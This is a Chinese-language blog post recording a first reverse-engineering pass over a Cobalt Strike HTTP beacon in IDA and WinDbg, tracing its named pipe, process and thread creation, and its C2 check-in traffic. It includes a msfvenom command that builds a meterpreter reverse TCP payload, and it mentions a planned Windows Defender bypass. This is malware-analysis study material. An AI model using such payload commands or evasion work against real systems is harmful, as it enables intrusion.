背景
RTO I 的课程结束了,Cobalt Strike 算是会用了。然后继上一篇文章之后,我还没有机会用 Cobalt Strike Beacon 做一下 Windows Defender Bypass。之后会写。
另外,我也想问一下我自己,Cobalt Strike 里面最基本的 payload - beacon,你了解清楚了吗?
所以今天,我就花点时间给自己解惑,同时也提出更多问题往后深入。
接下来先对 Beacon 做下逆向,看一下 HTTP Beacon 大致上都做了什么。
Beacon
创建一个基于 HTTP Listener 的 64位 beacon。
看一下文件格式,64位 PE 文件。
看到 PE 头。
xxd beacon.exe | less -S
这一段 bOb 很有意思,可以用作 Signature Detection 吗?
strings 一下看到了使用了哪些方法。
使用了哪些 dll。
在 IDA 里具体看一下。
创建命名管道
拖到 IDA。
从进度条长度来看,HTTP beacon 的复杂度并不高(也有可能是我什么都不懂,错的离谱)。
逆向的能力不是很强,所以先随便看看。
我的思路是能不能找到相关 API,如 VirtualAlloc,CreateThread 之类的字符串,或者是参数的字符串也行。所以我就一个一个点开看了一下。
运气比较好的是,在第四个 entry 就找到了。
如图,StartupInfo 是 CreateProcessA API 的参数。
CreateProcessA 方法原型。
BOOL CreateProcessA(
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);
找到了 StartupInfo,就意味着找到了 CreateProcess 。
接着往下看,不一会儿看到了 GetProcAddress API。
调用之后检查 eax 返回值,如果是 0 表示成功,跳到 loc_4012A1。
接着一个一个翻看左边的方法名列表。
在 sub_401795 找到了 CreateThread 方法。看到了默认的 pipe name。
拼接完成之后,应该是 \\.\pipe\MSSE-XX-server。
其中 xx 是一个数字跟 ecx 中的数值 (0x26AA -> 9898)做除法运算(实际是取模),最后取了 EDX 中的余数作为 xx 的值。
这里创建了一个线程并执行。看一下到底启动了一个什么样的线程。跟进 sub_401685,那里是执行代码的起始地址。
再跟进 sub_4015D0。
所以,上面的 CreateThread 方法,是创建一个命名管道,用来写入和读取数据,命令执行的结果应该就是通过管道来获取的。第一步完成,HTTP Beacon 首先创建了一个命名管道,管道名称就是上面看到的
\\.\pipe\MSSE-XX-server
继续跟进代码,看下一步做了什么操作。
连接命名管道
创建完了命名管道(如果创建成功),紧接着就是执行 ConnectNamedPipe 连接该命名管道。
这里开始网管道里面写数据。
写数据有了,读取在哪里呢?
继续往下找,可以看到这里调用了 CreateFileA API。
这里 dwCreateionDisposition 设置为 0x3。
查看官方文档,这个设置是会打开一个已经存在的文件或者设备。
猜想这里是用 CreateFileA 打开了已经创建好的管道。
然后通过 ReadFile API 读取数据。
唯一可以说明这里打开的文件就是之前创建的管道的指标,就是这个 Buffer (lpFileName) 参数。
双击点进去,可以看到他指向了 sub_4015D0。
而 sub_4015D0 正是创建命名管道的方法。
进一步可以判定,这个 Buffer 就是管道名,ReadFile 就是读取了该管道的数据。
Beacon HTTP 请求?
接下来,我想找到诸如 IP 地址,端口,从而找到 HTTP 请求的代码。
结果通过 IP 地址找不到。
返回去看 strings 命令的输出,确实没有看到跟 HTTP 或者 Socket 连接相关的方法或者是 DLL。
而如果看一下 msfvenom 生成的 payload。
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=443 -f exe -o msf.exe
strings msf.exe
可以很清楚看到诸如 WSADuplicateSocketA,WinHTTPConnect 等方法,也看到了 WS2_32.dll。
有点疑惑。
拖到 windows 机器上用 WinDBG 看一下。
看来 strings 不能列出运行期间会加载的 dll。
在 WindDBG 里面看到了 winhttp.dll,WS2_32.dll。
选择 WS2_32.dll 在 recv API 上打个断点试一下。
bp ws2_32!recv
发送一条命令看一下能不能触发断点。
断点触发了。其实每隔5秒就会触发断点,因为 beacon 会 checkin,就算没有命令可以执行,C2 Server 也会发送相应的 response。
sleep 没有输出。再执行一个 whoami 看一下怎么发送命令结果的。
再次触发断点。单步执行。
今天告一段落,找时间继续。还要验证一下上面所说的读取数据的 CreateFileA 方法。
总结
这篇文章对 Beacon 做了一些比较简单的分析。开个头先,之后还会不断深入。
KEEP CALM AND HACK AWAY!
参考链接
- https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/windows-x64-calling-convention-stack-frame
- https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea
- https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread
- https://learn.microsoft.com/en-us/windows/win32/api/winhttp/nf-winhttp-winhttpconnect
- https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsaduplicatesocketa
- https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-connect
- https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsastringtoaddressw
- https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/
- https://docs.oracle.com/cd/E19455-01/806-3773/6jct9o0am/index.html#:~:text=div%20executes%20unsigned%20division.,AH%2C%20Dx%2C%20or%20EDX.
3478
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
